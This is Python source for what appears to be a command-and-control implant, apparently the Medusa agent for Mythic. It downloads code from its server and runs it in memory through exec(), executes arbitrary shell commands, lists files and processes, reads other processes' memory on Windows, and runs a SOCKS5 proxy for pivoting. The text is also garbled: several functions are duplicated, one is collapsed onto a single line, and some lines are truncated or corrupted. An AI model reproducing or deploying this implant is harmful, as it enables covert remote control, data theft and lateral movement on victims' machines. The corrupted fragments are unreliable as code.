        def get_data(self, fullpath):
            # loader protocol: read an arbitrary file from the repo zip
            prefix = os.path.join(self.repoName, '')
            if not fullpath.startswith(prefix):
                raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
            relpath = fullpath[len(prefix):]
            try:
                return self.moduleRepo[self.repoName].read(relpath)
            except KeyError:
                raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
        def is_package(self, fullname):
            """Return if the module is a package"""
            submodule, is_package, relpath = self._get_info(self.repoName, fullname)
            return is_package
        def get_code(self, fullname):
            submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
            return compile(source, fullpath, 'exec')
    if module_name in self.moduleRepo.keys():
        return "{} module already loaded.".format(module_name)
    total_chunks = 1
    chunk_num = 0
    module_zip = bytearray()
    while (chunk_num < total_chunks):
        # honor jobkill between chunk fetches
        if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
            return "Job stopped."
        data = { "action": "post_response", "responses": [ {
            "upload": {
                "chunk_size": CHUNK_SIZE,
                "file_id": file,
                "chunk_num": chunk_num+1
            },
            "task_id": task_id
        } ]}
        response = self.postMessageAndRetrieveResponse(data)
        chunk = response["responses"][0]
        # the server reports the real chunk count in the first reply
        total_chunks = chunk["total_chunks"]
        chunk_num+=1
        module_zip.extend(base64.b64decode(chunk["chunk_data"]))
    if module_zip:
        self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))
        # register the finder once per repo name
        if module_name not in self._meta_cache:
            finder = CFinder(module_name, self)
            self._meta_cache[module_name] = finder
            sys.meta_path.append(finder)
    else:
        return "Failed to download in-memory module"
def load_module(self, task_id, file, module_name):
    # python3 build: download a zip of python source over C2 and make it
    # importable from memory by installing a PEP 302 finder/loader on
    # sys.meta_path that serves files out of the in-memory zip.
    import zipfile, io
    class CFinder(object):
        # Finder + loader backed by self.moduleRepo[repoName] (a ZipFile).
        def __init__(self, repoName, instance):
            self.moduleRepo = instance.moduleRepo
            self.repoName = repoName
            self._source_cache = {}
        def _get_info(self, repoName, fullname):
            # Resolve fullname inside the zip, trying plain module then
            # package layout; returns (submodule, is_package, relpath).
            parts = fullname.split('.')
            submodule = parts[-1]
            modulepath = '/'.join(parts)
            _search_order = [('.py', False), ('/__init__.py', True)]
            for suffix, is_package in _search_order:
                relpath = modulepath + suffix
                try:
                    self.moduleRepo[repoName].getinfo(relpath)
                except KeyError:
                    pass
                else:
                    return submodule, is_package, relpath
            msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName))
            raise ImportError(msg)
        def _get_source(self, repoName, fullname):
            submodule, is_package, relpath = self._get_info(repoName, fullname)
            fullpath = '%s/%s' % (repoName, relpath)
            if relpath in self._source_cache:
                source = self._source_cache[relpath]
                return submodule, is_package, fullpath, source
            try:
                source = self.moduleRepo[repoName].read(relpath)
                # normalise line endings so compile() accepts the source
                source = source.replace(b'\r\n', b'\n')
                source = source.replace(b'\r', b'\n')
                self._source_cache[relpath] = source
                return submodule, is_package, fullpath, source
            except:
                raise ImportError("Unable to obtain source for module %s" % (fullpath))
        def find_module(self, fullname, path=None):
            # PEP 302: return self if we can serve fullname, else None.
            try:
                submodule, is_package, relpath = self._get_info(self.repoName, fullname)
            except ImportError:
                return None
            else:
                return self
        def load_module(self, fullname):
            import types
            submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
            code = compile(source, fullpath, 'exec')
            # reuse an existing sys.modules entry if present (reimport)
            mod = sys.modules.setdefault(fullname, types.ModuleType(fullname))
            mod.__loader__ = self
            mod.__file__ = fullpath
            mod.__name__ = fullname
            if is_package:
                mod.__path__ = [os.path.dirname(mod.__file__)]
            exec(code, mod.__dict__)
            return mod
        def get_data(self, fullpath):
            # loader protocol: read an arbitrary file from the repo zip
            prefix = os.path.join(self.repoName, '')
            if not fullpath.startswith(prefix):
                raise IOError('Path %r does not start with module name %r', (fullpath, prefix))
            relpath = fullpath[len(prefix):]
            try:
                return self.moduleRepo[self.repoName].read(relpath)
            except KeyError:
                raise IOError('Path %r not found in repo %r' % (relpath, self.repoName))
        def is_package(self, fullname):
            """Return if the module is a package"""
            submodule, is_package, relpath = self._get_info(self.repoName, fullname)
            return is_package
        def get_code(self, fullname):
            submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname)
            return compile(source, fullpath, 'exec')
    if module_name in self.moduleRepo.keys():
        return "{} module already loaded.".format(module_name)
    total_chunks = 1
    chunk_num = 0
    module_zip = bytearray()
    while (chunk_num < total_chunks):
        # honor jobkill between chunk fetches
        if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
            return "Job stopped."
        data = { "action": "post_response", "responses": [ {
            "upload": {
                "chunk_size": CHUNK_SIZE,
                "file_id": file,
                "chunk_num": chunk_num+1
            },
            "task_id": task_id
        } ]}
        response = self.postMessageAndRetrieveResponse(data)
        chunk = response["responses"][0]
        # the server reports the real chunk count in the first reply
        total_chunks = chunk["total_chunks"]
        chunk_num+=1
        module_zip.extend(base64.b64decode(chunk["chunk_data"]))
    if module_zip:
        self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip))
        # register the finder once per repo name
        if module_name not in self._meta_cache:
            finder = CFinder(module_name, self)
            self._meta_cache[module_name] = finder
            sys.meta_path.append(finder)
    else:
        return "Failed to download in-memory module"
def load_script(self, task_id, file):
    """Fetch a python script from Mythic in chunks and exec() it inside
    the agent process; returns an error string if nothing was received."""
    expected_chunks = 1
    fetched = 0
    script_source = ""
    while fetched < expected_chunks:
        # honor jobkill between chunk fetches
        current = [t for t in self.taskings if t["task_id"] == task_id][0]
        if current["stopped"]:
            return "Job stopped."
        request = {
            "action": "post_response",
            "responses": [{
                "upload": {
                    "chunk_size": CHUNK_SIZE,
                    "file_id": file,
                    "chunk_num": fetched + 1
                },
                "task_id": task_id
            }]
        }
        reply = self.postMessageAndRetrieveResponse(request)
        piece = reply["responses"][0]
        fetched += 1
        # the server reports the real chunk count in the first reply
        expected_chunks = piece["total_chunks"]
        script_source += base64.b64decode(piece["chunk_data"]).decode()
    if not script_source:
        return "Failed to load script"
    exec(script_source)
def ls(self, task_id, path, file_browser=False):
    # List a file or directory (python2 build).  Returns JSON for the
    # operator and also attaches a Mythic "file_browser" structure to
    # the owning tasking so the UI file browser gets populated.
    #
    # path: "." for the agent CWD, an absolute path, or a path relative
    # to self.current_directory.
    if path == ".":
        file_path = self.current_directory
    else:
        file_path = path if path[0] == os.sep \
            else os.path.join(self.current_directory,path)
    file_details = os.stat(file_path)
    target_is_file = os.path.isfile(file_path)
    # the filesystem root has no basename, so special-case it
    target_name = os.path.basename(file_path.rstrip(os.sep)) if file_path != os.sep else os.sep
    file_browser = {
        "host": socket.gethostname(),
        "is_file": target_is_file,
        # last three octal digits of st_mode == the rwx permission bits
        "permissions": {"octal": oct(file_details.st_mode)[-3:]},
        "name": target_name if target_name not in [".", "" ] \
            else os.path.basename(self.current_directory.rstrip(os.sep)),
        "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)),
        "success": True,
        # Mythic expects millisecond timestamps
        "access_time": int(file_details.st_atime * 1000),
        "modify_time": int(file_details.st_mtime * 1000),
        "size": file_details.st_size,
        "update_deleted": True,
    }
    files = []
    if not target_is_file:
        for entry in os.listdir(file_path):
            full_path = os.path.join(file_path, entry)
            file = {}
            file['name'] = entry
            file['is_file'] = True if os.path.isfile(full_path) else False
            try:
                file_details = os.stat(full_path)
                file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]}
                file["access_time"] = int(file_details.st_atime * 1000)
                file["modify_time"] = int(file_details.st_mtime * 1000)
                file["size"] = file_details.st_size
            except OSError as e:
                # entry vanished or is unreadable: keep name/is_file only
                pass
            files.append(file)
    file_browser["files"] = files
    # stash the browser data on the tasking; the beacon loop posts it back
    task = [task for task in self.taskings if task["task_id"] == task_id]
    task[0]["file_browser"] = file_browser
    output = {
        "files": files,
        "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)),
        "name": target_name if target_name not in [".", ""] \
            else os.path.basename(self.current_directory.rstrip(os.sep))
    }
    return json.dumps(output)
def ls(self, task_id, path, file_browser=False):
    """List a file or directory (python3 build).

    Returns JSON for the operator and also attaches a Mythic
    "file_browser" structure to the owning tasking so the UI file
    browser gets populated.  `path` is "." for the agent CWD, an
    absolute path, or a path relative to self.current_directory.
    """
    if path == ".":
        file_path = self.current_directory
    elif path[0] == os.sep:
        file_path = path
    else:
        file_path = os.path.join(self.current_directory, path)
    stat_info = os.stat(file_path)
    target_is_file = os.path.isfile(file_path)
    # the filesystem root has no basename, so special-case it
    if file_path == os.sep:
        target_name = os.sep
    else:
        target_name = os.path.basename(file_path.rstrip(os.sep))
    if target_name in [".", ""]:
        display_name = os.path.basename(self.current_directory.rstrip(os.sep))
    else:
        display_name = target_name
    parent = os.path.abspath(os.path.join(file_path, os.pardir))
    file_browser = {
        "host": socket.gethostname(),
        "is_file": target_is_file,
        # last three octal digits of st_mode == the rwx permission bits
        "permissions": {"octal": oct(stat_info.st_mode)[-3:]},
        "name": display_name,
        "parent_path": parent,
        "success": True,
        # Mythic expects millisecond timestamps
        "access_time": int(stat_info.st_atime * 1000),
        "modify_time": int(stat_info.st_mtime * 1000),
        "size": stat_info.st_size,
        "update_deleted": True,
    }
    files = []
    if not target_is_file:
        with os.scandir(file_path) as entries:
            for entry in entries:
                record = {"name": entry.name, "is_file": entry.is_file()}
                try:
                    entry_stat = os.stat(os.path.join(file_path, entry.name))
                    record["permissions"] = {"octal": oct(entry_stat.st_mode)[-3:]}
                    record["access_time"] = int(entry_stat.st_atime * 1000)
                    record["modify_time"] = int(entry_stat.st_mtime * 1000)
                    record["size"] = entry_stat.st_size
                except OSError:
                    # entry vanished or is unreadable: keep name/is_file only
                    pass
                files.append(record)
    file_browser["files"] = files
    # stash the browser data on the tasking; the beacon loop posts it back
    matching = [t for t in self.taskings if t["task_id"] == task_id]
    matching[0]["file_browser"] = file_browser
    output = {
        "files": files,
        "parent_path": parent,
        "name": display_name,
    }
    return json.dumps(output)
def mv(self, task_id, source, destination):
    """Move (rename) a file or directory; relative paths resolve
    against the agent's current working directory."""
    import shutil
    if source[0] == os.sep:
        src = source
    else:
        src = os.path.join(self.current_directory, source)
    if destination[0] == os.sep:
        dst = destination
    else:
        dst = os.path.join(self.current_directory, destination)
    shutil.move(src, dst)


def pip_freeze(self, task_id):
    """Best-effort inventory of installed python packages.

    Tries pkg_resources first (pinned name==version list), then pip's
    internal freeze, then bare module names from pkgutil; reports which
    mechanisms were unavailable if all three fail.
    """
    failures = ""
    try:
        import pkg_resources
        pinned = ["%s==%s" % (dist.key, dist.version)
                  for dist in pkg_resources.working_set]
        return "\n".join(sorted(pinned))
    except:
        failures += "[*] pkg_resources module not installed.\n"
    try:
        from pip._internal.operations.freeze import freeze
        return "\n".join(freeze(local_only=True))
    except:
        failures += "[*] pip module not installed.\n"
    try:
        import pkgutil
        names = [name for _, name, _ in pkgutil.iter_modules()]
        return "\n".join(names)
    except:
        failures += "[*] pkgutil module not installed.\n"
    return failures + "[!] No modules available to list installed packages."
def ps(self, task_id):
    # Process listing for the python2 build.  Only implemented for
    # POSIX: parses /proc directly so no external tooling is required.
    # Also records the list on the tasking for Mythic's process browser.
    def get_user_id_map():
        user_map = {}
        # get username from uid
        with open("/etc/passwd", "r") as f:
            passwd = f.readlines()
        for line in passwd:
            user_line_arr = line.split(":")
            username = user_line_arr[0].strip()
            uid = user_line_arr[2].strip()
            user_map[uid] = username
        return user_map
    processes = []
    if os.name == 'posix':
        # Get the user map
        user_map = get_user_id_map()
        # get list of PIDs by performing a directory listing on /proc
        pids = [pid for pid in os.listdir("/proc") if pid.isdigit()]
        # loop through each PID and output information similar to ps command
        for pid in pids:
            # construct path to status file
            status_path = "/proc/%s/status" % str(pid)
            # read in the status file - bail if process dies before we read the status file
            try:
                with open(status_path, "r") as f:
                    status = f.readlines()
            except Exception as e:
                continue
            # construct path to status file
            cmdline_path = "/proc/%s/cmdline" % str(pid)
            # read in the status file
            with open(cmdline_path, "r") as f:
                cmdline = f.read()
            # argv entries in /proc cmdline are NUL-separated
            cmd_arr = cmdline.split("\x00")
            cmdline = " ".join(cmd_arr)
            # extract relevant information from status file
            name = ""
            ppid = ""
            uid = ""
            username = ""
            for line in status:
                if line.startswith("Name:"):
                    name = line.split()[1].strip()
                elif line.startswith("PPid:"):
                    ppid = line.split()[1].strip()
                elif line.startswith("Uid:"):
                    # first field of the Uid: line is the real uid
                    uid = line.split()[1].strip()
            # Map the uid to the username
            if uid in user_map:
                username = user_map[uid]
            process = {"process_id": int(pid), "parent_process_id": int(ppid),
                       "user_id": username, "name": name, "bin_path": cmdline}
            processes.append(process)
    # attach to the tasking; the beacon loop posts it back to Mythic
    task = [task for task in self.taskings if task["task_id"] == task_id]
    task[0]["processes"] = processes
    return json.dumps({ "processes": processes })
================================================ def ps(self, task_id): import os processes = [] if os.name == 'posix': def get_user_id_map(): user_map = {} # get username from uid with open("/etc/passwd", "r") as f: passwd = f.readlines() for line in passwd: user_line_arr = line.split(":") username = user_line_arr[0].strip() uid = user_line_arr[2].strip() user_map[uid] = username return user_map # Get the user map user_map = get_user_id_map() # get list of PIDs by performing a directory listing on /proc pids = [pid for pid in os.listdir("/proc") if pid.isdigit()] # loop through each PID and output information similar to ps command for pid in pids: # construct path to status file status_path = "/proc/%s/status" % str(pid) # read in the status file - bail if process dies before we read the status file try: with open(status_path, "r") as f: status = f.readlines() except Exception as e: continue # construct path to status file cmdline_path = "/proc/%s/cmdline" % str(pid) # read in the status file with open(cmdline_path, "r") as f: cmdline = f.read() cmd_arr = cmdline.split("\x00") cmdline = " ".join(cmd_arr) # extract relevant information from status file name = "" ppid = "" uid = "" username = "" for line in status: if line.startswith("Name:"): name = line.split()[1].strip() elif line.startswith("PPid:"): ppid = line.split()[1].strip() elif line.startswith("Uid:"): uid = line.split()[1].strip() # Map the uid to the username if uid in user_map: username = user_map[uid] process = {"process_id": int(pid), "parent_process_id": int(ppid), "user_id": username, "name": name, "bin_path": cmdline} processes.append(process) elif os.name == 'nt': import sys, os.path, ctypes, ctypes.wintypes, re from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = 
ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL GetProcessImageFileName = Psapi.GetProcessImageFileNameA GetProcessImageFileName.restype = ctypes.wintypes.DWORD Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 TOKEN_QUERY = 0x0008 TOKEN_READ = 0x00020008 TOKEN_IMPERSONATE = 0x00000004 TOKEN_QUERY_SOURCE = 0x0010 TOKEN_DUPLICATE = 0x0002 TOKEN_ASSIGN_PRIMARY = 0x0001 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value def query_dos_device(drive_letter): chars = 1024 drive_letter = drive_letter p = create_unicode_buffer(chars) if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars): pass return p.value def create_drive_mapping(): mappings = {} for letter in (chr(l) for l in range(ord('C'), ord('Z') + 1)): try: letter = u'%s:' % letter mapped = query_dos_device(letter) mappings[mapped] = letter except WindowsError: pass return mappings mappings = create_drive_mapping() def normalise_binpath(path): match = re.match(r'(^\\Device\\[a-zA-Z0-9]+)(\\.*)?$', path) if not match: return f"Cannot convert {path} into a Win32 compatible path" if not match.group(1) in mappings: return None drive = mappings[match.group(1)] if not drive or not match.group(2): return drive return drive + match.group(2) count = 32 while True: ProcessIds = 
(ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value0: filename = os.path.basename(ImageFileName.value) process["name"] = filename.decode() process["bin_path"] = normalise_binpath(ImageFileName.value.decode()) CloseHandle(hProcess) processes.append(process) task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["processes"] = processes return json.dumps({ "processes": processes }) ================================================ FILE: Payload_Type/medusa/medusa/agent_code/ps_full.py3 ================================================ def ps_full(self, task_id): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) MAX_PATH = 260 PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 
ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \ ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), 
('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle if not self._query_info() 
or (process_id is not None \ and self._process_id != process_id): return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: return False self._process_id = info.UniqueProcessId self._parent_process_id = info.InheritedFromUniqueProcessId self._peb = peb = info.PebBaseAddress[0, handle] self._params = peb.ProcessParameters[0, handle] Is64Bit = ctypes.c_int32() IsWow64Process(handle, ctypes.byref(Is64Bit)) self._arch = "x86" if Is64Bit.value else "x64" @property def process_id(self): return self._process_id @property def session_id(self): return self._peb.SessionId @property def image_path(self): ustr = self._params.ImagePathName return ustr.Buffer[0, self._handle, ustr.Length] @property def command_line(self): ustr = self._params.CommandLine buf = ustr.Buffer[0, self._handle, ustr.Length] return buf processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value 0: total_chunks = int(file_size / CHUNK_SIZE) + (file_size % CHUNK_SIZE > 0) data = { "action": "post_response", "responses": [ { "task_id": task_id, "total_chunks": total_chunks, "file_path": str(datetime.now()), "chunk_size": CHUNK_SIZE, "is_screenshot": True }] } initial_response = self.postMessageAndRetrieveResponse(data) for i in range(0,total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." 
def shell(self, task_id, command):
    """Run a command through the OS shell in the agent's current directory.

    Returns the command's stderr (decoded) when any was produced,
    otherwise its stdout.
    """
    import subprocess

    proc = subprocess.Popen(
        command,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        cwd=self.current_directory,
        shell=True,
    )
    out_data, err_data = proc.communicate()
    # Prefer stderr so failures surface in the task output.
    result = err_data if err_data else out_data
    return result.decode()
def sleep(self, task_id, seconds, jitter=-1):
    """Update the agent's checkin interval and, optionally, its jitter.

    A jitter of -1 (the default) means "leave the jitter unchanged".
    """
    self.agent_config["Sleep"] = int(seconds)
    if jitter == -1:
        return
    self.agent_config["Jitter"] = int(jitter)
def socks(self, task_id, action, port):
    """Start or stop the in-agent SOCKS5 proxy (Python 2 variant).

    action == "start": relay traffic between the Mythic server queues
    (self.socks_in / self.socks_out) and outbound TCP sockets until the
    task is stopped. Any other action: flag running socks tasks as
    stopped and clear the open-connection table.

    Fixes vs. original: create_socket's except clause referenced an
    unbound `err` (NameError), and the throttle path called bare
    `sleep(3)` where the rest of the function uses `time.sleep`.
    """
    # Imports made explicit so the command does not depend on
    # agent-global modules (base64/time/threading).
    import socket, select, base64, time, threading
    from threading import Thread, active_count
    from struct import pack, unpack
    from Queue import Queue
    MAX_THREADS = 200
    BUFSIZE = 2048
    TIMEOUT_SOCKET = 5
    OUTGOING_INTERFACE = ""
    VER = b'\x05'
    M_NOAUTH = b'\x00'
    M_NOTAVAILABLE = b'\xff'
    CMD_CONNECT = b'\x01'
    ATYP_IPV4 = b'\x01'
    ATYP_DOMAINNAME = b'\x03'
    SOCKS_SLEEP_INTERVAL = 0.1
    QUEUE_TIMOUT = 1

    def sendSocksPacket(server_id, data, exit_value):
        # Queue a datagram for delivery back to the Mythic server.
        self.socks_out.put({
            "server_id": server_id,
            "data": base64.b64encode(data),
            "exit": exit_value
        })

    def create_socket():
        try:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(TIMEOUT_SOCKET)
        except Exception as err:  # FIX: `err` was previously unbound
            return "Failed to create socket: {}".format(str(err))
        return sock

    def connect_to_dst(dst_addr, dst_port):
        sock = create_socket()
        if OUTGOING_INTERFACE:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, OUTGOING_INTERFACE)
            except PermissionError as err:
                return 0
        try:
            sock.connect((str(dst_addr), int(dst_port)))
            return sock
        except socket.error as err:
            return 0

    def request_client(msg):
        # Parse a SOCKS5 CONNECT request; returns (addr, port) or False.
        try:
            message = base64.b64decode(msg["data"])
            s5_request = bytearray(message[:BUFSIZE])
        except:
            return False
        if (s5_request[0:1] != VER or s5_request[1:2] != CMD_CONNECT
                or s5_request[2:3] != b'\x00'):
            return False
        if s5_request[3:4] == ATYP_IPV4:
            dst_addr = socket.inet_ntoa(s5_request[4:-2])
            dst_port = unpack('>H', s5_request[8:len(s5_request)])[0]
        elif s5_request[3:4] == ATYP_DOMAINNAME:
            sz_domain_name = s5_request[4]
            dst_addr = s5_request[5: 5 + sz_domain_name - len(s5_request)]
            port_to_unpack = s5_request[5 + sz_domain_name:len(s5_request)]
            dst_port = unpack('>H', port_to_unpack)[0]
        else:
            return False
        return (dst_addr, dst_port)

    def create_connection(msg):
        # Attempt the outbound connect and send the SOCKS5 reply upstream.
        dst = request_client(msg)
        rep = b'\x07'
        bnd = b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00' + b'\x00'
        if dst:
            socket_dst = connect_to_dst(dst[0], dst[1])
        if not dst or socket_dst == 0:
            rep = b'\x01'
        else:
            rep = b'\x00'
            bnd = socket.inet_aton(socket_dst.getsockname()[0])
            bnd += pack(">H", socket_dst.getsockname()[1])
        reply = VER + rep + b'\x00' + ATYP_IPV4 + bnd
        try:
            sendSocksPacket(msg["server_id"], reply, msg["exit"])
        except:
            return
        if rep == b'\x00':
            return socket_dst

    def get_running_socks_thread():
        # Other socks task threads (excluding this task's own).
        return [t for t in threading.enumerate()
                if "socks:" in t.name and not task_id in t.name]

    def a2m(server_id, socket_dst):
        # agent -> Mythic: read from the target socket, ship to server.
        while True:
            if task_id not in [task["task_id"] for task in self.taskings]:
                return
            elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return
            if server_id not in self.socks_open.keys():
                return
            try:
                reader, _, _ = select.select([socket_dst], [], [], 1)
            except select.error as err:
                return
            if not reader:
                continue
            try:
                for sock in reader:
                    data = sock.recv(BUFSIZE)
                    if not data:
                        sendSocksPacket(server_id, b"", True)
                        socket_dst.close()
                        return
                    sendSocksPacket(server_id, data, False)
            except Exception as e:
                pass
            time.sleep(SOCKS_SLEEP_INTERVAL)

    def m2a(server_id, socket_dst):
        # Mythic -> agent: pop queued data from server, write to socket.
        while True:
            if task_id not in [task["task_id"] for task in self.taskings]:
                return
            elif [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]:
                return
            if server_id not in self.socks_open.keys():
                socket_dst.close()
                return
            try:
                if not self.socks_open[server_id].empty():
                    socket_dst.send(base64.b64decode(self.socks_open[server_id].get(timeout=QUEUE_TIMOUT)))
            except:
                pass
            time.sleep(SOCKS_SLEEP_INTERVAL)

    t_socks = get_running_socks_thread()
    if action == "start":
        if len(t_socks) > 0:
            return "[!] SOCKS Proxy already running."
